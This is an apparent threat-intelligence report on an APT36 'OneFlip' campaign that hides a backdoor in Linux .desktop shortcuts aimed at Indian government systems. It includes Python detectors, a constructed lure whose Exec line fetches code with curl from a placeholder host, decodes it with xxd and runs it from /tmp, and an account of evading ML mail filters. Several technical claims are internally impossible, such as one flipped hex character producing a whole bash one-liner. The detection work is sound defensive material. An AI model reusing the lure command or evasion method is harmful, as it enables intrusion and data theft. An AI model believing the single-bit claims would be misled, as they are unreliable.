CYFIRMA researchers have uncovered a campaign they have codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file can be enough to subvert a neural-network-driven security workflow and open a backdoor on the underlying host.
Transparent Tribe (APT36) is leveraging the trick against India’s Government networks that rely on the indigenous BOSS GNU/Linux distribution, while continuing to run a parallel Windows lure for mixed-fleet environments.
The group’s lure, first seen on 1 August 2025, arrives by spear-phishing email as the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.
Inside sits a shortcut called “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME type and filename convince most users and, crucially, many machine-learning-based mail gateways that it is only a PDF link.
APT36 weaponises Linux “.desktop” shortcuts
The novelty sits in the Exec= line. By toggling a single hexadecimal character, the attackers replace the legitimate viewer call with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it through xxd to rebuild the raw ELF, drops it in /tmp with a timestamped name, marks it executable and launches it under nohup.
Firefox is then opened on an innocuous Google Drive PDF to complete the illusion of normality.
Because the file is declared Type=Application and Terminal=false, no console appears, while X-GNOME-Autostart-enabled=true guarantees the shortcut fires on every log-in, flipping a single persistence bit inside the user’s session metadata.
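The .desktop inspection that the article recommends for EDR can be prototyped with a small parser. The following is an added example, not CYFIRMA's or APT36's code: it reads the [Desktop Entry] group, scores the Exec= value for compound shell directives (shell wrapper, downloader, hex decoder, /tmp drop, chmod, backgrounding), and flags the document-masquerade filename and autostart traits described above. Both sample entries are constructed for illustration; the URL in the lure sample is a placeholder, not a live indicator.

```python
"""Heuristic inspector for Linux .desktop shortcuts.

Added example (not CYFIRMA's tooling): flags the traits the OneFlip lure
combines -- a PDF-looking filename on a Type=Application entry, a compound
shell command in Exec=, and autostart with no terminal. Sample entries below
are constructed for illustration; the URL is a placeholder, not a live IoC.
"""
import re
from dataclasses import dataclass, field

# Exec= values that chain downloaders, decoders or backgrounding are suspicious
# for a shortcut that claims to open a document.
SHELL_PATTERNS = {
    "shell_wrapper": re.compile(r"\b(ba)?sh\s+-c\b"),
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "hex_decoder": re.compile(r"\bxxd\b|\bbase64\s+(-d|--decode)\b"),
    "tmp_drop": re.compile(r"/tmp/"),
    "chmod_exec": re.compile(r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7[0-7]*\b"),
    "background": re.compile(r"\bnohup\b|&\s*$|\bsetsid\b"),
    "pipeline": re.compile(r"\||&&|;"),
}


@dataclass
class Verdict:
    path: str
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A single hit (e.g. one ';') is noise; the lure stacks many.
        return len(self.findings) >= 2


def parse_desktop(text: str) -> dict:
    """Parse the [Desktop Entry] group into a key->value dict."""
    entry, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            k, v = line.split("=", 1)
            entry[k.strip()] = v.strip()
    return entry


def inspect_desktop(path: str, text: str) -> Verdict:
    """Score one shortcut; `path` is the filename as delivered."""
    v = Verdict(path)
    e = parse_desktop(text)
    exec_line = e.get("Exec", "")
    for name, rx in SHELL_PATTERNS.items():
        if rx.search(exec_line):
            v.findings.append(f"exec:{name}")
    # Document-looking name, yet declared as an application rather than a viewer link
    if re.search(r"\.(pdf|docx?|xlsx?)\.desktop$", path, re.I) and e.get("Type") == "Application":
        v.findings.append("name:document_masquerade")
    if e.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        v.findings.append("persist:autostart")
    if e.get("Terminal", "").lower() == "false" and "exec:shell_wrapper" in v.findings:
        v.findings.append("stealth:hidden_terminal")
    return v


# Constructed samples: a legitimate viewer shortcut and a lure shaped like the one described.
BENIGN = """[Desktop Entry]
Type=Application
Name=Quarterly Report
Exec=evince /home/user/Documents/report.pdf
Icon=application-pdf
Terminal=false
"""

LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s https://PLACEHOLDER.invalid/p.txt | xxd -r -p > /tmp/upd; chmod +x /tmp/upd; nohup /tmp/upd & firefox https://drive.google.com/"
Icon=application-pdf
MimeType=application/pdf
Terminal=false
X-GNOME-Autostart-enabled=true
"""

if __name__ == "__main__":
    for name, text in (("Quarterly_Report.desktop", BENIGN), ("Meeting_Ltr_ID1543ops.pdf.desktop", LURE)):
        r = inspect_desktop(name, text)
        print(name, "SUSPICIOUS" if r.suspicious else "clean", r.findings)
```

In a gateway or EDR hook the same function would run over every `.desktop` extracted from an archive; the threshold of two findings keeps ordinary launchers (which often contain a single `;` or `%U`) from alerting while the stacked traits of the lure score well above it.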
Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped section names, oversized NOBITS regions and a hard-coded string for hxxp://modgovindia[.]space:4000.

Runtime analysis confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.
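The user-level persistence just described (a unit named like a system updater, a copy of the implant under ~/.config/systemd, and a reboot cron entry) can be hunted with unit-file and crontab parsing. The following is an added example, not CYFIRMA's tooling: it audits per-user systemd units for an ExecStart that lives in a user-writable or temporary directory, and crontab text for commands pointing at the same places. The unit and crontab samples are constructed for illustration and only mirror the shape reported above.

```python
"""Hunt for the user-level persistence attributed to the implant.

Added example, not CYFIRMA's tooling: checks user systemd unit text and
crontab text for the traits described -- a unit masquerading as a system
updater, an ExecStart under ~/.config/systemd or /tmp, and a reboot cron
entry pointing at the same binary. Inputs are constructed sample text.
"""
import re

# Directories where a legitimate per-user service binary rarely lives.
SUSPECT_DIRS = ("/.config/systemd/", "/tmp/", "/dev/shm/")
UPDATER_NAMES = re.compile(r"(system|security)[-_]?update", re.I)


def parse_unit(text):
    """Return {section: {key: value}} for a systemd unit file (last value wins)."""
    sections, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            sections.setdefault(cur, {})
        elif cur and "=" in line:
            k, v = line.split("=", 1)
            sections[cur][k.strip()] = v.strip()
    return sections


def exec_path(value):
    """Strip systemd ExecStart prefixes (-, @, +, !) and return the executable."""
    parts = value.lstrip("-@+!").split()
    return parts[0] if parts else ""


def audit_user_unit(unit_name, text, home="/home/user"):
    """Flag a per-user unit whose name or ExecStart matches the described implant."""
    findings = []
    svc = parse_unit(text).get("Service", {})
    path = exec_path(svc.get("ExecStart", "")).replace("~", home)
    if UPDATER_NAMES.search(unit_name):
        findings.append("name:fake_updater")
    if any(d in path for d in SUSPECT_DIRS):
        findings.append(f"execstart:suspect_dir:{path}")
        # Restart policy on a binary in a scratch directory is a reboot-survival tell.
        if svc.get("Restart", "no") != "no":
            findings.append("restart:always_on_suspect_binary")
    return findings


def audit_crontab(text):
    """Flag crontab lines whose command lives in a suspect directory."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # '@reboot cmd' has one field before the command; timed entries have five.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        cmd = parts[-1] if len(parts) > 1 else ""
        if any(d in cmd for d in SUSPECT_DIRS):
            findings.append(f"cron:{parts[0]}:{cmd}")
    return findings


# Constructed samples shaped like the reported artefacts (paths are illustrative).
UNIT = """[Unit]
Description=System Update Service

[Service]
ExecStart=/home/user/.config/systemd/systemd-update
Restart=always

[Install]
WantedBy=default.target
"""

CRON = """# constructed sample crontab
0 2 * * * /usr/bin/backup.sh
@reboot /home/user/.config/systemd/systemd-update >/dev/null 2>&1
"""

if __name__ == "__main__":
    print(audit_user_unit("system-update.service", UNIT))
    print(audit_crontab(CRON))
```

On a live BOSS host the unit text would come from `~/.config/systemd/user/*.service` and `*.timer`, and the crontab text from `crontab -l` run as each user; the point of the example is that neither the unit name nor the binary path alone is decisive, but the combination of a vendor-sounding name, a binary under a dot-directory and a restart or @reboot trigger is.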
Stealth persistence established
Socket traces show non-blocking DNS queries via 127.0.0.53 that resolve modgovindia[.]space to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and data exfiltration.
The implant has already been caught siphoning directory listings, local user databases and SSH keys, indicating the adversary is staging wider lateral movement.
The OneFlip moniker reflects the campaign’s ability to defeat automated inspection pipelines that now rely heavily on deep-learning classifiers.
By embedding its malicious logic in the unstructured Exec string and altering only a single byte relative to a legitimate template, the shortcut retains a near-identical feature vector; the neural net continues to score it as benign, while human operators see only a PDF icon.
This underscores a broader weakness in AI-assisted filtering: models that are not retrained on Linux-specific threat artefacts are blind to subtle, syntax-level perturbations.
Defenders should harden BOSS hosts with noexec mounts on /tmp, block outbound access to newly registered domains, and deploy an EDR that inspects .desktop files for compound shell directives.
Mail systems must detonate Linux shortcuts in sandboxed VMs because signature-less, single-bit polymorphism is now a proven bypass technique.
Finally, security teams running machine-learning detection stacks should expand training sets to include Linux UI artefacts and test adversarial robustness against command-concatenation patterns.
CYFIRMA assesses that APT36 will continue enriching its backdoor until host-based models learn to spot these minimal flips; until then, the group retains a stealthy, dual-platform foothold inside critical Indian Government infrastructure.
Indicators of Compromise
S.No | Indicator | Type / Action
---|---|---
1 | 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 | SHA-256 / Block |
2 | 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 | SHA-256 / Block |
3 | e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b | SHA-256 / Block |
4 | securestore[.]cv | Domain / Block |
5 | modgovindia[.]space | Domain / Block |
6 | 45[.]141[.]58[.]199 | IP / Monitor |